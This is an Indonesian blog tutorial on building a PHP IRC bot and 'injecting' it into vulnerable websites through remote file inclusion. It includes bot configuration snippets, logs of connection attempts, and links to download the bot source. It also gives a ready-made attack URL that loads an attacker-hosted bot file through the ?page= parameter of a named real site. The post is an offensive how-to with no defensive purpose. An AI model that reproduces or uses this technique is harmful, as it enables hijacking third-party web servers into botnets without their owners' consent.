buat-bot-php-dengan-injekan

Sekedar untuk berbagi cerita, Banyak bot-bot yang ada samping bot eggdrop, botscan, botnet dan juga bot php dan yang lainnya.
disini saya ingin berbagi tentang cara membuat bot php yang untuk dijadikan sebagai injekan.
1. Harus punya Situs/webhostingan.
Kita harus memiliki tempat situs/web dimana kita bisa menggunakan web kita itu sebagai tempa menyimpan data, bisa yang gratis atau yang bayar, terserah yang penting ada, tujuannya untuk menyimpan source file bot injekan kita tadi.

2. Source bot injekan.
yang ini penting banget, kalau mau meload bot php hasil injekan, kalo gak punya yach sabar, atau pake bot orang lain dan biar join di chan orang yang punya source itu hihihihiihih.

3. Target tentunya.
Untuk meload bot php/bot injek tentunya menggunakan target yang bisa meload bot itu sendiri, dan nggak selamanya setiap target bisa meload bot, karena ada macamnya, mulai dari fsockopen() atau apalah, ya solusinya cari target yang lain atau ganti dengan target baru.

pesan error pada php saat menginjek untuk meload bot

== Connecting to arcor.dal.net...
Warning: fsockopen() [function.fsockopen]: unable to connect to arcor.dal.net:6667 in http://henca.prohosts.org/ds?.inc on line 140
== Connecting to novel.ix.us.dal.net…
Warning: fsockopen() [function.fsockopen]: unable to connect to novel.ix.us.dal.net:6667 in http://henca.prohosts.org/ds?.inc on line 140
== Connecting to punch.va.us.dal.net…
Warning: fsockopen() [function.fsockopen]: unable to connect to punch.va.us.dal.net:6667 in http://henca.prohosts.org/ds?.inc on line 140
== Connecting to matrix.dal.net…
Warning: fsockopen() [function.fsockopen]: unable to connect to matrix.dal.net:6667 in http://henca.prohosts.org/ds?.inc on line 140
== Connecting to punch.va.us.dal.net…
Warning: fsockopen() [function.fsockopen]: unable to connect to punch.va.us.dal.net:6667 in http://henca.prohosts.org/ds?.inc on line 140
== Connecting to rumble.dal.net…
Warning: fsockopen() [function.fsockopen]: unable to connect to rumble.dal.net:6667 in http://henca.prohosts.org/ds?.inc on line 140

setelah punya webhosting untuk source bot injekan, tinggal mencari source bot injekan tadi kamu bisa lihat di google atau ambil disini http://henca.prohosts.org/ds? setelah dapat soucenya tinggal di ubah sedikit atau keseluruhannya ( itu kalau kamu emang ngerti bahasanya Very Happy ).

cuplikan Source bot injekan dan yang harus di ubah :

$Admin = ‘Shinchi’;

$BOT_PASSWORD = ”;

$channels = ‘#dompu’;

$remotehst2= array(”irc.dal.net”,”novel.ix.us.dal.net”,”punch.va.us.dal.net”);

Untuk bagian yang di ubah adalah :
$admin = ‘Shinchi’; diganti dengan nickmu, sebagai admin bot.
Untuk $bot_password = ” dapat kamu kosongkan atau di isi semua terserah kamu, ntar kalo botnya datang tinggal pv botnya dan ketikan auth passbot jadi nggak perlu ketikan pass passbot kemudia ketikan lagi auth pasbot.
Yang penting lagi adalah ubah pada bagian $channels = ‘#dompu’; supaya bot yang kamu load nggak salah masuk channel. Terakhir adalah $remotehst2= array(”irc.dal.net”) yaitu server yang akan di gunakan oleh bot kamu. untuk servernya jangan sampai salah masukkannya, ntar bisa-bisa botnya nggak bisa masuk, soalnya salah server. Atau mungkin juga server yang kamu masukkan adalah 2 server jadi server dalnet dan server lain soalnya untuk pilihan $remotehst2= array(”irc.dal.net”) adalah array artinya dia pilih salah satu server yang ada. untuk lebih jelasnya coba praktekan aja Smile .

Oke lanjutt….., panjang juga yach ceritanya…. hihihihi pusing jadinya….

kalo udah source masuk dan terupload dalam webhosting kita tinggal injek dech, itupun kalo ada injekan kalo nggak ada injekan yach cari dech, atau minta ama tmn di irc Very Happy .

misalnya kamu udah dapatkan sebuah target, mau dapatnya dari teman, atau cari sendiri yach terserah, trus injek dech tuh bot pake target.

caranya :

http://www.qbooster.com/index.php?page=http://henca.prohosts.org/ds?
nah jelas khan warnanya….. kalo gak bisa liat yach emang kamu buta warna ( xixixix becanda ko Very Happy )
Untuk yang warna Biru adalah targetnya http://www.qbooster.com/index.php dan file index.php memiliki vuln/bug sehingga bisa di injek dengan menambahkan path yang berwarna kuning ?page= dan di ikuti dengan injekan bot tadi yang berwarna pink http://henca.prohosts.org/ds? dan jangan lupa setiap injekan di tambahkan tanda tanya di akhir injekan ? nah trus ngecek dech ada apa nggak botnya di channel kamu Very Happy.

maaf kalau banyak kekurangan ntar tak tambah lagii……..Xixixixxiixi

====
Update Botphp for inject :
http://injek.by.ru/botphp/
buat-bot-php-dengan-injekan buat-bot-php-dengan-injekan Reviewed by Furkan Samadha on 8:16 AM Rating: 5